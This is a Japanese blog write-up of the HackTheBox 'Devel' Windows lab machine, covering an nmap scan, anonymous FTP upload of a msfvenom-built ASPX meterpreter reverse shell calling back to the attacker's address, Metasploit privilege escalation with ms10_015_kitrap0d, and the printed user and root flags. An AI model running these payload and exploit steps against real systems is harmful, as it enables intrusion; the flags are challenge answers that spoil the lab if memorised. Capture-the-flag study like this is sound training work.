HackTheBox WriteUp:Devel
HackTheBoxの攻略対象3つ目
前回に引き続きWindowsマシンでしたが、ぶっちゃけ実力不足過ぎてほとんど進めることができませんでした
そのため、ほとんどは以下のWalkthroughを参考に進めました
https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/
そのうち、自力でこういうマシンくらいなら解けるようになるのかな・・・
1.探索
今回も、いつものようにnmapから始めた
kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ sudo nmap -sS -sV -A -p 0-20000 --script vuln -T5 10.10.10.5 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 21:14 EDT Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 10.10.10.5 Host is up (0.34s latency). Not shown: 19999 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_sslv2-drown: 80/tcp open http Microsoft IIS httpd 7.5 |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Microsoft-IIS/7.5 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 139.20 ms 10.10.14.1 2 365.20 ms 10.10.10.5 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 737.76 seconds
確認できたサービスは2つ
21/TCP FTP
80/TCP HTTP
また、HTTPサービスが立ち上がっているため、http://10.10.10.5にアクセスしたところ、
以下サイトが表示された
2.侵入
確認できたサービスに対して、侵入を試みた
FTPについて、簡単なユーザ等で接続が可能か試してみた
kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:kali): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 03-18-17 02:06AM <DIR> aspnet_client 03-17-17 05:37PM 689 iisstart.htm 03-17-17 05:37PM 184946 welcome.png 226 Transfer complete. ftp> kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:kali): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 03-18-17 02:06AM <DIR> aspnet_client 03-17-17 05:37PM 689 iisstart.htm 03-17-17 05:37PM 184946 welcome.png 226 Transfer complete. ftp>
結果、ftp/ftpの組み合わせでログインに成功した
また、annonimousによるログインも成功した
Webサーバが立ち上がっていることもあり、
FTPとの組み合わせによるリバースシェルを仕掛けることとした
リバースシェルに用いるためのペイロードは、
msfvenomを用いて作成した
kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.9 LPORT=1234 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of aspx file: 2834 bytes Saved as: devel.aspx
これをFTPでマシン側へ送った
kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:kali): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put devel.aspx local: devel.aspx remote: devel.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 2870 bytes sent in 0.00 secs (23.5952 MB/s) ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 03-18-17 02:06AM <DIR> aspnet_client 06-30-20 12:41AM 2870 devel.aspx 03-17-17 05:37PM 689 iisstart.htm 03-17-17 05:37PM 184946 welcome.png 226 Transfer complete. ftp>
その後、Metasploit側の操作にて、リバースシェルによる接続を確立した
kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ msfconsole [!] The following modules were loaded with warnings: [!] /usr/share/metasploit-framework/modules/exploits/19671.rb [!] Please see /home/kali/.msf4/logs/framework.log for details. , , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| =[ metasploit v5.0.85-dev ] + -- --=[ 2003 exploits - 1093 auxiliary - 342 post ] + -- --=[ 560 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: Display the Framework log using the log command, learn more with help log msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > set payload Display all 519 possibilities? (y or n) msf5 exploit(multi/handler) > set payload windows/meterpreter set payload windows/meterpreter/bind_hidden_ipknock_tcp set payload windows/meterpreter/reverse_nonx_tcp set payload windows/meterpreter/bind_hidden_tcp set payload windows/meterpreter/reverse_ord_tcp set payload windows/meterpreter/bind_ipv6_tcp set payload windows/meterpreter/reverse_tcp set payload windows/meterpreter/bind_ipv6_tcp_uuid set payload windows/meterpreter/reverse_tcp_allports set payload windows/meterpreter/bind_named_pipe set payload windows/meterpreter/reverse_tcp_dns set payload windows/meterpreter/bind_nonx_tcp set payload windows/meterpreter/reverse_tcp_rc4 set payload windows/meterpreter/bind_tcp set payload windows/meterpreter/reverse_tcp_rc4_dns set payload windows/meterpreter/bind_tcp_rc4 set payload windows/meterpreter/reverse_tcp_uuid set payload windows/meterpreter/bind_tcp_uuid set payload windows/meterpreter/reverse_winhttp set payload windows/meterpreter/reverse_hop_http set payload windows/meterpreter/reverse_winhttps set payload windows/meterpreter/reverse_http set payload windows/meterpreter_bind_named_pipe set payload windows/meterpreter/reverse_http_proxy_pstore set payload windows/meterpreter_bind_tcp set payload windows/meterpreter/reverse_https set payload windows/meterpreter_reverse_http set payload windows/meterpreter/reverse_https_proxy set payload windows/meterpreter_reverse_https set payload windows/meterpreter/reverse_ipv6_tcp set payload windows/meterpreter_reverse_ipv6_tcp set payload windows/meterpreter/reverse_named_pipe set payload windows/meterpreter_reverse_tcp msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > set LHOST 10.10.14.9 LHOST => 10.10.14.9 msf5 exploit(multi/handler) > set LPORT 1234 LPORT => 1234 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.9:1234 [*] Sending stage (180291 bytes) to 10.10.10.5 [*] Meterpreter session 2 opened (10.10.14.9:1234 -> 10.10.10.5:49163) at 2020-06-26 09:56:55 -0400 meterpreter >
なお、セッションを待っている状況で、
ブラウザ上からはhttp://10.10.10.5/devel.aspxにアクセスしてリバースシェルを確立している
以下コマンドによる確認を行ったが、有益な情報は得られなかった
meterpreter > search -f user.txt No files matching your search were found. meterpreter > shell Process 3820 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>systeminfo systeminfo Host Name: DEVEL OS Name: Microsoft Windows 7 Enterprise OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: babis Registered Organization: Product ID: 55041-051-0948536-86302 Original Install Date: 17/3/2017, 4:17:31 �� System Boot Time: 29/6/2020, 11:07:23 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 1.023 MB Available Physical Memory: 688 MB Virtual Memory: Max Size: 2.047 MB Virtual Memory: Available: 1.525 MB Virtual Memory: In Use: 522 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.5 c:\windows\system32\inetsrv>
3.権限昇格
Metasploitを用いて、権限昇格が可能かどうかを判別した
meterpreter > background [*] Backgrounding session 1... msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits msf5 post(multi/recon/local_exploit_suggester) > set session 1 session => 1 msf5 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.5 - Collecting local exploits for x86/windows... [*] 10.10.10.5 - 30 exploit checks are being tried... [+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed msf5 post(multi/recon/local_exploit_suggester) >
このうち、exploit/windows/local/ms10_015_kitrap0dを使用して権限昇格を行った
meterpreter > background [*] Backgrounding session 3... msf5 exploit(multi/handler) > show sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 3 meterpreter x86/windows IIS APPPOOL\Web @ DEVEL 10.10.14.9:1234 -> 10.10.10.5:49157 (10.10.10.5) msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d msf5 exploit(windows/local/ms10_015_kitrap0d) > show options Module options (exploit/windows/local/ms10_015_kitrap0d): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 2 yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.9 yes The listen address (an interface may be specified) LPORT 1234 yes The listen port Exploit target: Id Name -- ---- 0 Windows 2K SP4 - Windows 7 (x86) msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 3 session => 3 msf5 exploit(windows/local/ms10_015_kitrap0d) > run [*] Started reverse TCP handler on 10.10.14.9:1234 [*] Launching notepad to host the exploit... [+] Process 1672 launched. [*] Reflectively injecting the exploit DLL into 1672... [*] Injecting exploit into 1672 ... [*] Exploit injected. Injecting payload into 1672... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (180291 bytes) to 10.10.10.5 [*] Meterpreter session 4 opened (10.10.14.9:1234 -> 10.10.10.5:49158) at 2020-06-26 10:38:36 -0400 meterpreter > ls Listing: c:\windows\system32\inetsrv ==================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 138752 fil 2009-07-13 20:11:35 -0400 AppHostNavigators.dll 100777/rwxrwxrwx 125440 fil 2009-07-13 20:10:51 -0400 InetMgr.exe 100666/rw-rw-rw- 126976 fil 2009-07-13 18:39:34 -0400 Microsoft.Web.Administration.dll 100666/rw-rw-rw- 1048576 fil 2009-07-13 18:39:42 -0400 Microsoft.Web.Management.dll 100666/rw-rw-rw- 137728 fil 2009-07-13 20:11:35 -0400 XPath.dll 100777/rwxrwxrwx 155648 fil 2009-07-13 20:11:25 -0400 appcmd.exe 100666/rw-rw-rw- 3654 fil 2009-06-10 17:17:16 -0400 appcmd.xml 100666/rw-rw-rw- 61440 fil 2009-07-13 20:11:12 -0400 apphostsvc.dll 100666/rw-rw-rw- 313856 fil 2009-07-13 20:11:17 -0400 appobj.dll 100666/rw-rw-rw- 389632 fil 2009-07-13 20:11:14 -0400 asp.dll 100666/rw-rw-rw- 22196 fil 2009-07-13 17:04:57 -0400 asp.mof 100777/rwxrwxrwx 195584 fil 2009-07-13 20:11:42 -0400 aspnetca.exe 100666/rw-rw-rw- 22528 fil 2009-07-13 20:10:58 -0400 asptlb.tlb 100666/rw-rw-rw- 32256 fil 2009-07-13 20:11:17 -0400 authanon.dll 100666/rw-rw-rw- 48640 fil 2009-07-13 20:11:01 -0400 browscap.dll 100666/rw-rw-rw- 33404 fil 2017-03-17 10:37:32 -0400 browscap.ini 100666/rw-rw-rw- 17408 fil 2009-07-13 20:11:22 -0400 cachfile.dll 100666/rw-rw-rw- 44544 fil 2009-07-13 20:11:28 -0400 cachhttp.dll 100666/rw-rw-rw- 10240 fil 2009-07-13 20:11:27 -0400 cachtokn.dll 100666/rw-rw-rw- 9728 fil 2009-07-13 20:11:27 -0400 cachuri.dll 100666/rw-rw-rw- 43520 fil 2009-07-13 20:11:22 -0400 compstat.dll 40777/rwxrwxrwx 4096 dir 2017-03-17 10:37:32 -0400 config 100666/rw-rw-rw- 41984 fil 2009-07-13 20:11:21 -0400 custerr.dll 100666/rw-rw-rw- 19456 fil 2009-07-13 20:11:22 -0400 defdoc.dll 100666/rw-rw-rw- 23552 fil 2009-07-13 20:11:22 -0400 dirlist.dll 40777/rwxrwxrwx 4096 dir 2017-03-17 10:37:32 -0400 en-US 100666/rw-rw-rw- 55808 fil 2009-07-13 20:11:24 -0400 filter.dll 100666/rw-rw-rw- 16384 fil 2009-07-13 20:11:29 -0400 ftpconfigext.dll 100666/rw-rw-rw- 9728 fil 2009-07-13 20:11:28 -0400 ftpctrlps.dll 100666/rw-rw-rw- 10240 fil 2009-07-13 20:11:29 -0400 ftpmib.dll 100666/rw-rw-rw- 14848 fil 2009-07-13 20:11:29 -0400 ftpres.dll 100666/rw-rw-rw- 308224 fil 2009-07-13 20:11:36 -0400 ftpsvc.dll 100666/rw-rw-rw- 69252 fil 2009-07-13 18:40:37 -0400 ftpsvc.mof 100666/rw-rw-rw- 27136 fil 2009-07-13 20:10:58 -0400 gzip.dll 100666/rw-rw-rw- 22528 fil 2009-07-13 20:11:09 -0400 httpmib.dll 100666/rw-rw-rw- 12800 fil 2009-07-13 20:11:17 -0400 hwebcore.dll 100666/rw-rw-rw- 63105 fil 2009-07-13 18:39:38 -0400 iis.msc 100666/rw-rw-rw- 197632 fil 2009-07-13 20:11:24 -0400 iiscore.dll 100666/rw-rw-rw- 89088 fil 2009-07-13 20:11:33 -0400 iisreg.dll 100666/rw-rw-rw- 12288 fil 2009-07-13 20:11:26 -0400 iisreqs.dll 100666/rw-rw-rw- 220160 fil 2009-07-13 20:11:11 -0400 iisres.dll 100777/rwxrwxrwx 30720 fil 2009-07-13 20:11:04 -0400 iisrstas.exe 100777/rwxrwxrwx 240128 fil 2009-07-13 20:11:45 -0400 iissetup.exe 100666/rw-rw-rw- 59904 fil 2009-07-13 20:11:36 -0400 iissyspr.dll 100666/rw-rw-rw- 205824 fil 2009-07-13 20:11:15 -0400 iisutil.dll 100666/rw-rw-rw- 396288 fil 2009-07-13 20:11:15 -0400 iisw3adm.dll 100666/rw-rw-rw- 106496 fil 2009-07-13 20:11:24 -0400 isapi.dll 100666/rw-rw-rw- 19456 fil 2009-07-13 20:11:23 -0400 loghttp.dll 100666/rw-rw-rw- 39424 fil 2009-07-13 20:11:26 -0400 modrqflt.dll 100666/rw-rw-rw- 363008 fil 2009-07-13 20:11:24 -0400 nativerd.dll 100666/rw-rw-rw- 19968 fil 2009-07-13 20:11:24 -0400 protsup.dll 100666/rw-rw-rw- 26624 fil 2009-07-13 20:11:11 -0400 rsca.dll 100666/rw-rw-rw- 49664 fil 2009-07-13 20:11:14 -0400 rscaext.dll 100666/rw-rw-rw- 37888 fil 2009-07-13 20:11:28 -0400 static.dll 100666/rw-rw-rw- 18944 fil 2009-07-13 20:11:22 -0400 validcfg.dll 100666/rw-rw-rw- 9216 fil 2009-07-13 20:11:07 -0400 w3ctrlps.dll 100666/rw-rw-rw- 30208 fil 2009-07-13 20:11:09 -0400 w3ctrs.dll 100666/rw-rw-rw- 24064 fil 2009-07-13 20:11:18 -0400 w3dt.dll 100666/rw-rw-rw- 15872 fil 2009-07-13 20:11:15 -0400 w3tp.dll 100777/rwxrwxrwx 20480 fil 2009-07-13 20:11:23 -0400 w3wp.exe 100666/rw-rw-rw- 55296 fil 2009-07-13 20:11:16 -0400 w3wphost.dll 100666/rw-rw-rw- 23552 fil 2009-07-13 20:11:13 -0400 wbhst_pm.dll 100666/rw-rw-rw- 24064 fil 2009-07-13 20:11:09 -0400 wbhstipm.dll
その後、user.txtおよびroot.txtを捜索し、発見した
meterpreter > cd / meterpreter > ls Listing: c:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2009-07-13 22:36:15 -0400 $Recycle.Bin 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Documents and Settings 40777/rwxrwxrwx 0 dir 2009-07-13 22:37:05 -0400 PerfLogs 40555/r-xr-xr-x 4096 dir 2009-07-13 22:37:05 -0400 Program Files 40777/rwxrwxrwx 4096 dir 2009-07-13 22:37:05 -0400 ProgramData 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:30 -0400 Recovery 40777/rwxrwxrwx 8192 dir 2017-03-17 07:09:34 -0400 System Volume Information 40555/r-xr-xr-x 4096 dir 2009-07-13 22:37:05 -0400 Users 40777/rwxrwxrwx 16384 dir 2009-07-13 22:37:05 -0400 Windows 100777/rwxrwxrwx 24 fil 2009-07-13 22:04:04 -0400 autoexec.bat 100666/rw-rw-rw- 10 fil 2009-07-13 22:04:04 -0400 config.sys 40777/rwxrwxrwx 4096 dir 2017-03-17 10:37:31 -0400 inetpub 57211620/rw--w---- 59948775560478703 fif 1908705379-07-18 19:36:16 -0500 pagefile.sys meterpreter > cd Users lmeterpreter > ls Listing: c:\Users ================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 8192 dir 2017-03-17 19:16:43 -0400 Administrator 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 All Users 40777/rwxrwxrwx 8192 dir 2017-03-17 19:06:26 -0400 Classic .NET AppPool 40555/r-xr-xr-x 8192 dir 2009-07-13 22:37:05 -0400 Default 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Default User 40555/r-xr-xr-x 4096 dir 2009-07-13 22:37:05 -0400 Public 40777/rwxrwxrwx 8192 dir 2017-03-17 10:17:37 -0400 babis 100666/rw-rw-rw- 174 fil 2009-07-14 00:41:57 -0400 desktop.ini meterpreter > cd babis lmeterpreter > ls Listing: c:\Users\babis ======================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:40 -0400 AppData 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:40 -0400 Application Data 40555/r-xr-xr-x 0 dir 2017-03-17 10:17:44 -0400 Contacts 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:40 -0400 Cookies 40555/r-xr-xr-x 0 dir 2017-03-17 10:17:40 -0400 Desktop 40555/r-xr-xr-x 4096 dir 2017-03-17 10:17:40 -0400 Documents 40555/r-xr-xr-x 0 dir 2017-03-17 10:17:40 -0400 Downloads 40555/r-xr-xr-x 4096 dir 2017-03-17 10:17:40 -0400 Favorites 40555/r-xr-xr-x 0 dir 2017-03-17 10:17:40 -0400 Links 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:40 -0400 Local Settings 40555/r-xr-xr-x 0 dir 2017-03-17 10:17:40 -0400 Music 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:40 -0400 My Documents 100666/rw-rw-rw- 524288 fil 2017-03-17 10:17:40 -0400 NTUSER.DAT 100666/rw-rw-rw- 65536 fil 2017-03-17 10:17:40 -0400 NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf 100666/rw-rw-rw- 524288 fil 2017-03-17 10:17:40 -0400 NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms 100666/rw-rw-rw- 524288 fil 2017-03-17 10:17:40 -0400 NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:40 -0400 NetHood 40555/r-xr-xr-x 0 dir 2017-03-17 10:17:40 -0400 Pictures 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:40 -0400 PrintHood 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:40 -0400 Recent 40555/r-xr-xr-x 0 dir 2017-03-17 10:17:40 -0400 Saved Games 40555/r-xr-xr-x 0 dir 2017-03-17 10:17:52 -0400 Searches 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:40 -0400 SendTo 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:40 -0400 Start Menu 40777/rwxrwxrwx 0 dir 2017-03-17 10:17:40 -0400 Templates 40555/r-xr-xr-x 0 dir 2017-03-17 10:17:40 -0400 Videos 100666/rw-rw-rw- 262144 fil 2017-03-17 10:17:40 -0400 ntuser.dat.LOG1 100666/rw-rw-rw- 0 fil 2017-03-17 10:17:40 -0400 ntuser.dat.LOG2 100666/rw-rw-rw- 20 fil 2017-03-17 10:17:40 -0400 ntuser.ini meterpreter > cd Desktop lsmeterpreter > ls Listing: c:\Users\babis\Desktop =============================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 282 fil 2017-03-17 10:17:51 -0400 desktop.ini 100444/r--r--r-- 32 fil 2017-03-17 19:14:21 -0400 user.txt.txt meterpreter > cat user.txt.txt 9ecdd6a3aedf24b41562fea70f4cb3e8meterpreter > cd .. meterpreter > cd .. meterpreter > ls Listing: c:\Users ================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 8192 dir 2017-03-17 19:16:43 -0400 Administrator 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 All Users 40777/rwxrwxrwx 8192 dir 2017-03-17 19:06:26 -0400 Classic .NET AppPool 40555/r-xr-xr-x 8192 dir 2009-07-13 22:37:05 -0400 Default 40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Default User 40555/r-xr-xr-x 4096 dir 2009-07-13 22:37:05 -0400 Public 40777/rwxrwxrwx 8192 dir 2017-03-17 10:17:37 -0400 babis 100666/rw-rw-rw- 174 fil 2009-07-14 00:41:57 -0400 desktop.ini meterpreter > cd Administrator cdmeterpreter > cd Desktop ls meterpreter > ls caListing: c:\Users\Administrator\Desktop ======================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 282 fil 2017-03-17 19:16:53 -0400 desktop.ini 100444/r--r--r-- 32 fil 2017-03-17 19:17:20 -0400 root.txt.txt meterpreter > cat root.txt.txt e621a0b5041708797c4fc4728bc72b4bmeterpreter >
多くの部分をWalkthroughに頼ってしまったが、
結果的には非常に学びが多かったので良かった
以上